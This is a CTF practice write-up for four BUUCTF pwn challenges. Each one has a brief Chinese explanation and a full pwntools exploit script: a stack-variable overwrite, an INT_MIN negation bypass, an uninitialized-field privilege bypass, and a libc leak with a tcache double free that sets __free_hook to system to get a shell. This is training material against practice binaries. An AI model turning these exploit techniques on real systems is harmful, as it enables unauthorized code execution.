PWN-PRACTICE-BUUCTF-26
- 护网杯_2018_gettingstart
- wustctf2020_number_game
- picoctf_2018_are you root
- ciscn_2019_en_3
护网杯_2018_gettingstart
read到buf的时候存在栈溢出(脚本里buf到v5之间填充了0x18字节),覆写v5为0x7FFFFFFFFFFFFFFF(int64最大值),v6为0x3FB999999999999A(double 0.1的IEEE-754编码)
from pwn import *

# Remote instance of the challenge (swap for process("./...") when testing locally).
HOST, PORT = "node4.buuoj.cn", 29057

# The read() into buf overruns it; the three zero qwords are the padding up to v5,
# and v6 sits directly after v5 (offsets as used in the writeup).
PADDING = b"\x00" * 0x18
V5 = 0x7FFFFFFFFFFFFFFF  # int64 max
V6 = 0x3FB999999999999A  # IEEE-754 bit pattern of the double 0.1

io = remote(HOST, PORT)
io.recvuntil(b"But Whether it starts depends on you.\n")
io.send(PADDING + p64(V5) + p64(V6))  # send(), not sendline(): a trailing newline would land after v6
io.sendline(b"cat flag")
io.interactive()
wustctf2020_number_game
neg对操作数执行求补运算:用零减去操作数,然后把结果写回操作数
求补运算也可以表达成:将操作数按位取反后加1
0x80000000(即-2147483648, 32位有符号整数的最小值)按位取反后加1仍然是0x80000000——取负在32位下溢出回自身,因此直接发送-2147483648即可
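from pwn import *

# Remote instance of the challenge (swap for process("./wustctf2020_number_game") when testing locally).
HOST, PORT = "node4.buuoj.cn", 29209

io = remote(HOST, PORT)

# neg on INT_MIN (0x80000000) overflows back to INT_MIN in 32-bit two's complement,
# so the value stays negative after the "negation" — that is the whole bypass.
# The ELF itself is not needed for this (no symbols/addresses are used), so it is
# not loaded; the script then has no dependency on a local copy of the binary.
io.sendline(b"-2147483648")
io.sendline(b"cat flag")
io.interactive()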
picoctf_2018_are you root
未初始化验证漏洞,参考:PicoCTF_2018_are_you_root(未初始化验证漏洞)
# -*- coding:utf-8 -*-
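from pwn import *

# Remote instance of the challenge (swap for process("./PicoCTF_2018_are_you_root") when testing locally).
HOST, PORT = "node4.buuoj.cn", 26285

io = remote(HOST, PORT)


def login(name: bytes) -> None:
    """Send `login <name>` at the prompt. `name` is bytes so a packed value can be appended."""
    io.sendlineafter(b">", b"login " + name)


def reset() -> None:
    """Send `reset` at the prompt (logs out / frees the current user)."""
    io.sendlineafter(b">", b"reset")


def get_flag() -> None:
    """Send `get-flag` at the prompt."""
    io.sendlineafter(b">", b"get-flag")


# Everything sent is bytes: the original `'a'*8 + p64(5)` is str + bytes and raises
# TypeError on Python 3. The 8 bytes fill the name slot and p64(5) lands in the field
# right after it (the authorization level, per the writeup's description); reset()
# does not clear that field, so the next login inherits it — the "uninitialized"
# check the challenge is about. Re-check the 8-byte offset if the binary changes.
login(b"a" * 0x8 + p64(0x5))
reset()
login(b"P1umH0")
get_flag()
io.interactive()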
ciscn_2019_en_3
puts泄露libc(ID输入满8字节后,puts会连带打印出紧随其后的libc指针),堆上利用uaf + double free(tcache,需与提供的libc-2.27-18匹配),参考:ciscn_2019_en_3 tcache
# -*- coding:utf-8 -*-
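from pwn import *

# context.log_level = "debug"

# Remote instance of the challenge (swap for process("./ciscn_2019_en_3") when testing locally).
HOST, PORT = "node4.buuoj.cn", 29625

io = remote(HOST, PORT)
elf = ELF("./ciscn_2019_en_3")
libc = ELF("./libc-2.27-18-x64.so")  # must be the libc the target actually runs; every offset below depends on it

# --- libc leak -----------------------------------------------------------
io.sendlineafter(b"What's your name?\n", b"P1umH0")
# A full 8-byte ID leaves no terminator, so the puts() that echoes it keeps
# printing into the next stack qword, which holds a libc pointer. Take the 6
# significant bytes ending in 0x7f and zero-extend them to a qword.
# NOTE: `.ljust(8, "\x00")` with a str fill raises TypeError on Python 3 bytes;
# the fill must be bytes.
io.sendlineafter(b"Please input your ID.\n", b"a" * 8)
leak = u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))

# The leaked pointer is setbuffer+231 for this libc (offset taken from the
# writeup; re-derive it with gdb if the libc build changes).
setbuffer_addr = leak - 231
libc_base = setbuffer_addr - libc.sym["setbuffer"]
free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]
log.info("libc base: %#x", libc_base)


# --- menu helpers ----------------------------------------------------------
def add(size: int, content: bytes) -> None:
    """Menu 1: allocate a story of `size` bytes and fill it with `content` (a newline is appended)."""
    io.sendlineafter(b"Input your choice:", b"1")
    io.sendlineafter(b"Please input the size of story: \n", str(size).encode())
    io.sendlineafter(b"please inpute the story: \n", content)


def edit() -> None:
    """Menu 2 (not used by this exploit)."""
    io.sendlineafter(b"Input your choice:", b"2")


def show() -> None:
    """Menu 3 (not used by this exploit)."""
    io.sendlineafter(b"Input your choice:", b"3")


def free(index: int) -> None:
    """Menu 4: free the story at `index`; the program keeps the stale pointer, which is the UAF."""
    io.sendlineafter(b"Input your choice:", b"4")
    io.sendlineafter(b"Please input the index:\n", str(index).encode())


def quit_program() -> None:
    """Menu 5: exit. (Named so it does not shadow the builtin `exit`.)"""
    io.sendlineafter(b"Input your choice:", b"5")


# --- tcache double free -> __free_hook = system ----------------------------
# gdb.attach(io) here when debugging locally.
add(0x20, b"aaaa")          # index 0: the chunk we will double-free
add(0x20, b"/bin/sh\x00")   # index 1: its contents become system()'s argument

# Freeing index 0 twice puts the same chunk into the 0x30 tcache bin twice. This
# only works because the provided libc lacks the tcache double-free check that
# glibc 2.29+ (and some patched 2.27 builds) perform; on those it aborts with
# "free(): double free detected in tcache 2".
free(0)
free(0)

# The first allocation returns chunk 0, and its first qword is the tcache
# `next` pointer — overwriting it with __free_hook poisons the bin.
add(0x20, p64(free_hook))
add(0x20, b"bbbb")          # pops chunk 0 again; the bin head is now __free_hook
add(0x20, p64(system))      # this "chunk" is __free_hook itself: write system there
free(1)                     # free("/bin/sh") -> __free_hook -> system("/bin/sh")
io.interactive()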